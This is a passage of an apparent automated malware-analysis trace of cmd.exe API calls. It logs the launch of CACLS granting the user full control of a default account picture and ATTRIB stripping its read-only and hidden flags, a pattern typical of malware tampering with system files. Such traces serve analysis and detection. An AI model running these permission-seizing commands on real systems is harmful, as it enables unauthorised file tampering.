"c:\\windows\\system32\\cmd.exe")) returned 0x1b [0178.937] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.937] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.937] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.937] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0178.937] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0178.937] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0178.937] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0178.937] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0178.937] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0178.937] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0178.937] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0178.937] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0178.938] GetEnvironmentStringsW () returned 0x2e2458* [0178.938] FreeEnvironmentStringsW (penv=0x2e2458) returned 1 [0178.938] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.938] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0178.938] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0178.938] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0178.938] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0178.938] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0178.938] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0178.938] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0178.938] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0178.938] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0178.938] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1af778 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.938] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x1af778, lpFilePart=0x1af774 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af774*="Desktop") returned 0x18 [0178.938] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0178.938] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x1af4f4 | out: lpFindFileData=0x1af4f4) returned 0x2e0ae8 [0178.938] FindClose (in: hFindFile=0x2e0ae8 | out: hFindFile=0x2e0ae8) returned 1 [0178.938] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x1af4f4 | out: lpFindFileData=0x1af4f4) returned 0x2e0ae8 [0178.938] FindClose (in: hFindFile=0x2e0ae8 | out: hFindFile=0x2e0ae8) returned 1 [0178.938] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x1af4f4 | out: lpFindFileData=0x1af4f4) returned 0x2e0ae8 [0178.939] FindClose (in: hFindFile=0x2e0ae8 | out: hFindFile=0x2e0ae8) returned 1 [0178.939] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0178.939] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0178.939] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0178.939] GetEnvironmentStringsW () returned 0x2e0308* [0178.939] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.939] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0178.939] GetConsoleOutputCP () returned 0x1b5 [0178.940] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) 
returned 1 [0178.940] GetUserDefaultLCID () returned 0x409 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x1af8b8, cchData=128 | out: lpLCData="0") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x1af8b8, cchData=128 | out: lpLCData="0") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x1af8b8, cchData=128 | out: lpLCData="1") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0178.940] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0178.940] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0178.941] GetConsoleTitleW (in: lpConsoleTitle=0x2d09b8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0178.941] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0178.941] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0178.942] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0178.942] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0178.942] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0178.943] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0178.943] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0178.943] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0178.943] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0178.943] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0178.943] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0178.943] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0178.946] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0178.946] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0178.946] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0178.946] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0178.946] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0178.946] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0178.946] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0178.948] GetConsoleTitleW (in: lpConsoleTitle=0x1af54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.955] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0178.955] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0178.955] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 
[0178.955] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0178.955] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0178.955] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0178.955] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0178.955] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0178.955] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0178.955] _wcsicmp (_String1="CACLS", _String2="SHIFT") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0178.955] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0178.955] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0178.955] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0178.955] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0178.955] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0178.955] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0178.955] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0178.955] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0178.955] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0178.955] _wcsicmp (_String1="CACLS", _String2="MOVE") 
returned -10 [0178.955] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0178.955] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0178.955] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0178.956] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0178.956] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0178.956] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0178.956] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0178.956] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0178.956] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0178.956] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="SET") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="PAUSE") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="DATE") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="TIME") returned -17 [0178.956] _wcsicmp (_String1="CACLS", _String2="PROMPT") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="MD") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="MKDIR") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="RD") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="RMDIR") returned -15 [0178.956] _wcsicmp (_String1="CACLS", _String2="PATH") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="GOTO") returned -4 [0178.956] _wcsicmp (_String1="CACLS", _String2="SHIFT") 
returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="CLS") returned -11 [0178.956] _wcsicmp (_String1="CACLS", _String2="CALL") returned -9 [0178.956] _wcsicmp (_String1="CACLS", _String2="VERIFY") returned -19 [0178.956] _wcsicmp (_String1="CACLS", _String2="VER") returned -19 [0178.956] _wcsicmp (_String1="CACLS", _String2="VOL") returned -19 [0178.956] _wcsicmp (_String1="CACLS", _String2="EXIT") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="SETLOCAL") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="ENDLOCAL") returned -2 [0178.956] _wcsicmp (_String1="CACLS", _String2="TITLE") returned -17 [0178.956] _wcsicmp (_String1="CACLS", _String2="START") returned -16 [0178.956] _wcsicmp (_String1="CACLS", _String2="DPATH") returned -1 [0178.956] _wcsicmp (_String1="CACLS", _String2="KEYS") returned -8 [0178.956] _wcsicmp (_String1="CACLS", _String2="MOVE") returned -10 [0178.956] _wcsicmp (_String1="CACLS", _String2="PUSHD") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="POPD") returned -13 [0178.956] _wcsicmp (_String1="CACLS", _String2="ASSOC") returned 2 [0178.956] _wcsicmp (_String1="CACLS", _String2="FTYPE") returned -3 [0178.956] _wcsicmp (_String1="CACLS", _String2="BREAK") returned 1 [0178.956] _wcsicmp (_String1="CACLS", _String2="COLOR") returned -14 [0178.957] _wcsicmp (_String1="CACLS", _String2="MKLINK") returned -10 [0178.957] _wcsicmp (_String1="CACLS", _String2="FOR") returned -3 [0178.957] _wcsicmp (_String1="CACLS", _String2="IF") returned -6 [0178.957] _wcsicmp (_String1="CACLS", _String2="REM") returned -15 [0178.957] _wcsnicmp (_String1="CACL", _String2="cmd ", _MaxCount=0x4) returned -12 [0178.957] SetErrorMode (uMode=0x0) returned 0x0 [0178.957] SetErrorMode (uMode=0x1) returned 0x0 [0178.957] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x2e1e98, lpFilePart=0x1af06c | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x1af06c*="Desktop") returned 0x18 [0178.957] 
SetErrorMode (uMode=0x0) returned 0x1 [0178.957] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0178.957] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0178.962] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0178.963] GetLastError () returned 0x2 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\CACLS", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0178.963] GetLastError () returned 0x2 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\CACLS.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2e2180 [0178.963] FindClose (in: hFindFile=0x2e2180 | out: hFindFile=0x2e2180) returned 1 [0178.963] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.COM", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0178.964] GetLastError () returned 0x2 [0178.964] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\cacls.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2e2180 [0178.964] FindClose (in: hFindFile=0x2e2180 | out: hFindFile=0x2e2180) returned 1 [0178.964] _wcsicmp 
(_String1=".EXE", _String2=".BAT") returned 3 [0178.964] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0178.964] GetConsoleTitleW (in: lpConsoleTitle=0x1af2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0178.964] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af230 | out: lpAttributeList=0x1af168, lpSize=0x1af230) returned 1 [0178.964] UpdateProcThreadAttribute (in: lpAttributeList=0x1af168, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af168, lpPreviousValue=0x0) returned 1 [0178.964] GetStartupInfoW (in: lpStartupInfo=0x1af124 | out: lpStartupInfo=0x1af124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0178.964] lstrcmpW (lpString1="\\cacls.exe", lpString2="\\XCOPY.EXE") returned -1 [0178.965] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\cacls.exe", lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C ", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C ", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af210 
| out: lpCommandLine="CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\" /E /G EEBsYm5:F /C ", lpProcessInformation=0x1af210*(hProcess=0x50, hThread=0x4c, dwProcessId=0xa48, dwThreadId=0xb10)) returned 1 [0178.968] CloseHandle (hObject=0x4c) returned 1 [0178.968] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0178.968] GetEnvironmentStringsW () returned 0x2e0308* [0178.968] FreeEnvironmentStringsW (penv=0x2e0308) returned 1 [0178.968] WaitForSingleObject (hHandle=0x50, dwMilliseconds=0xffffffff) returned 0x0 [0179.051] GetExitCodeProcess (in: hProcess=0x50, lpExitCode=0x1af104 | out: lpExitCode=0x1af104*=0x0) returned 1 [0179.052] CloseHandle (hObject=0x50) returned 1 [0179.052] _vsnwprintf (in: _Buffer=0x1af24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af110 | out: _Buffer="00000000") returned 8 [0179.052] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0179.052] GetEnvironmentStringsW () returned 0x2e2410* [0179.052] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.052] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.052] GetEnvironmentStringsW () returned 0x2e2410* [0179.052] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.052] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af168 | out: lpAttributeList=0x1af168) [0179.052] GetConsoleTitleW (in: lpConsoleTitle=0x1af54c, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.053] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0179.053] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0179.053] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: 
lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0179.053] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0179.053] GetLastError () returned 0x2 [0179.053] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop\\ATTRIB", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0179.053] GetLastError () returned 0x2 [0179.053] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\ATTRIB.*", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2de4d8 [0179.054] FindClose (in: hFindFile=0x2de4d8 | out: hFindFile=0x2de4d8) returned 1 [0179.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.COM", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0xffffffff [0179.054] GetLastError () returned 0x2 [0179.054] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\attrib.EXE", fInfoLevelId=0x1, lpFindFileData=0x1aede8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x1aede8) returned 0x2de4d8 [0179.054] FindClose (in: hFindFile=0x2de4d8 | out: hFindFile=0x2de4d8) returned 1 [0179.054] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0179.054] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0179.054] GetConsoleTitleW (in: lpConsoleTitle=0x1af2e0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0179.054] InitializeProcThreadAttributeList (in: lpAttributeList=0x1af168, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x1af230 | out: lpAttributeList=0x1af168, lpSize=0x1af230) returned 1 
[0179.054] UpdateProcThreadAttribute (in: lpAttributeList=0x1af168, dwFlags=0x0, Attribute=0x60001, lpValue=0x1af228, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x1af168, lpPreviousValue=0x0) returned 1 [0179.054] GetStartupInfoW (in: lpStartupInfo=0x1af124 | out: lpStartupInfo=0x1af124*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0179.055] lstrcmpW (lpString1="\\attrib.exe", lpString2="\\XCOPY.EXE") returned -1 [0179.055] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\attrib.exe", lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\EEBsYm5\\Desktop", lpStartupInfo=0x1af1c4*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1af210 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp\"", lpProcessInformation=0x1af210*(hProcess=0x4c, hThread=0x50, dwProcessId=0x55c, dwThreadId=0xcb8)) returned 1 [0179.057] CloseHandle (hObject=0x50) returned 1 [0179.057] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0179.057] GetEnvironmentStringsW () returned 0x2e2410* [0179.057] 
FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.057] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0179.721] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1af104 | out: lpExitCode=0x1af104*=0x0) returned 1 [0179.721] CloseHandle (hObject=0x4c) returned 1 [0179.721] _vsnwprintf (in: _Buffer=0x1af24c, _BufferCount=0x13, _Format="%08X", _ArgList=0x1af110 | out: _Buffer="00000000") returned 8 [0179.721] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0179.722] GetEnvironmentStringsW () returned 0x2e2410* [0179.722] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.722] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0179.722] GetEnvironmentStringsW () returned 0x2e2410* [0179.722] FreeEnvironmentStringsW (penv=0x2e2410) returned 1 [0179.722] DeleteProcThreadAttributeList (in: lpAttributeList=0x1af168 | out: lpAttributeList=0x1af168) [0179.722] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.722] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0179.722] _get_osfhandle (_FileHandle=1) returned 0x7 [0179.722] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0179.722] _get_osfhandle (_FileHandle=0) returned 0x3 [0179.722] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0179.722] SetConsoleInputExeNameW () returned 0x1 [0179.722] GetConsoleOutputCP () returned 0x1b5 [0179.722] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0179.722] SetThreadUILanguage (LangId=0x0) returned 0x409 [0179.723] exit (_Code=0) Process: id = "329" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0xa48" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "328" os_parent_pid = "0xa14" cmd_line = "CACLS \"C:\\Users\\All 
